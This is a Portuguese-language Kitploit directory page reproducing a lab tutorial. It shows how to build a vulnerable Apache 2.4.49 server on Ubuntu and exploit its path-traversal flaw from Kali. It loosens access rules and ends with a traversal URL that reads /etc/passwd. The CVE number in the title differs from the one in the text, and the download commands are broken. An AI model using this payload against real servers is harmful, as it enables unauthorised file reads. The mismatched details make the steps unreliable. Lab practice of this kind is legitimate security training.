Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/alexs18/cve-2021-4773
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubalexs18/cve-2021-4773

CVE-2021-4773

Tutorial passo a passo demonstrando como configurar um ambiente Apache 2.4.49 vulnerável e explorar CVE-2021-41773 path traversal usando Kali Linux e Ubuntu Server VMs.

Ver Repositório
2há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-4773

este é um exemplo prático de como explorar a vulnerabilidade CVE-2021-4773 com uma máquina virtual

para este tutorial você precisa do seguinte

  • máquina virtual como kali linux
  • máquina virtual como ubuntu server
  • instalar apache versão 2.4.49

então vamos começar quando você tiver 2 máquinas virtuais em execução, instalará o apache versão 2.4.49 com um repositório de arquivos você pode encontrar esta versão em https://archive.apache.org/dist/httpd/CHANGES_2.4.49

Instalar e configurar a versão vulnerável no ubuntu server

1 na primeira vez em sua máquina virtual servidor, execute o seguinte comando

root@kitploit:~
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2  ou wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 

2 na segunda vez, você precisa descompactar esta versão do apache assim

root@kitploit:~
tar -xvjf httpd-2.4.49.tar.bz2

3 instale o seguinte pacote

root@kitploit:~
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev

4 execute o arquivo executável no diretório principal (arquivo configure) use a flag para especificar o diretório de instalação

root@kitploit:~
./configure --prefix=/usr/local/apache2

5 compile a versão vulnerável

root@kitploit:~
make

6 instale a versão vulnerável

root@kitploit:~
make install

7 verifique a versão

root@kitploit:~
ls /usr/local/apache2

8 inicie o processo

root@kitploit:~
/usr/local/apache2/bin/apachectl start
  

9 verifique o processo

root@kitploit:~
ps aux | grep httpd

10 configure a vulnerabilidade encontre o arquivo /usr/local/apache2/conf/httpd.conf e configure o diretório admin encontre a tag directory e altere Require all denied para

root@kitploit:~
  Required all granted
  

encontre a tag Files .ht* Required all denied para

root@kitploit:~
  Required all granted

a primeira alteração é para explorar a vulnerabilidade no ambiente local e a segunda é para expor no ambiente real

Explorar a vulnerabilidade no kali linux

1 escaneie o endereço ip com nmap com o seguinte comando

root@kitploit:~
nmap -sV ip_address

2 faça um curl ou get para testar o servidor apache

root@kitploit:~
curl ip_address ou faça wget ip_address

3 veja como explorar a vulnerabilidade na próxima página se quiser entender a sintaxe

root@kitploit:~
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability

ou apenas use o seguinte payload

root@kitploit:~
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Baixar ferramenta